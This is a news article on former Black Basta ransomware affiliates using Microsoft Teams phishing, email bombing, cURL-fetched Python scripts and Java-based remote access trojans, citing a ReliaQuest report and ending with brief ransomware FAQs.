Former members of the Black Basta ransomware group are back in action, this time using familiar tactics like Microsoft Teams phishing, email bombing, and newly added Python-based payloads to breach corporate networks.
According to a recent report by cybersecurity firm ReliaQuest, former Black Basta members have come together again to launch a wave of Microsoft Teams phishing attacks, combining them with email bombing and malicious scripting to gain long-term access to target systems.
These attacks, observed between February and May 2025, largely originated from compromised or spoofed onmicrosoft[.]com domains. Targets have included sectors such as finance, insurance, and construction, with attackers posing as help desk personnel to trick unsuspecting users into granting access.
The group has evolved beyond traditional social engineering by introducing malicious Python scripts, deployed via cURL requests. Once initial access is achieved through Microsoft Teams or email-based phishing, attackers reportedly initiate remote desktop sessions using tools like Quick Assist and AnyDesk. These sessions allow them to deploy advanced payloads, establish command-and-control (C2) communication, and maintain persistence.
ReliaQuest’s findings indicate that attackers are leveraging this access to download and run Java-based remote access trojans (RATs), updated versions of malware previously used in Black Basta campaigns. The malware now uses cloud services like Google Drive and OneDrive to proxy commands, making detection even more difficult.
Black Basta was a notorious ransomware group that emerged in 2022, quickly becoming one of the most dangerous cybercrime operations by targeting hundreds of organizations with double-extortion tactics. It was formed by former members of the Conti and REvil gangs and relied on tools like QakBot and phishing campaigns, including Microsoft Teams lures, for initial access.
The group suffered a major blow in 2023 when law enforcement disrupted its infrastructure. In February 2025, a massive internal chat log leak exposed its operations, members, and internal disputes, effectively dismantling the group. While the Black Basta name has gone quiet, its former members are believed to have joined or formed other ransomware groups, keeping the threat alive under new banners.
ReliaQuest stressed the persistence and evolution of tactics used by former Black Basta affiliates, stating, “Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads.” The company noted that many of these Microsoft Teams phishing attacks originated from onmicrosoft[.]com domains or compromised legitimate domains, allowing the attackers to appear more authentic. ReliaQuest added, “The shutdown of Black Basta's data-leak site, despite the continued use of its tactics, indicates that former affiliates have likely either migrated to another RaaS group or formed a new one.” They emphasized that the most likely scenario is that these actors have joined the CACTUS ransomware group, supported by leaked internal chats referencing payments of “$500–600K to CACTUS.” The firm also warned about the growing use of Python scripts and Java-based malware in these campaigns, stating, “The use of Python scripts in this attack highlights an evolving tactic that's likely to become more prevalent in future Teams phishing campaigns in the immediate future.”
The resurgence of Black Basta-style tactics shows that ransomware groups may disband in name but continue operating under new identities, using the same or more advanced techniques. This persistence shows how threat actors evolve faster than traditional defenses, exploiting trusted tools like Microsoft Teams and cloud services to infiltrate organizations undetected.
See also: HIPAA Compliant Email: The Definitive Guide (2025 Update)
Ransomware is a type of malicious software that encrypts a victim’s data or system, rendering it inaccessible until a ransom is paid.
Responses vary, but often include isolating affected systems, involving cybersecurity experts, reporting to authorities, and, ideally, not paying the ransom. Organizations may also review and strengthen their cybersecurity protocols.
To avoid detection, escape law enforcement, or reset their reputations. Even after public exposure, the core members often continue operations using similar tactics under a different group identity.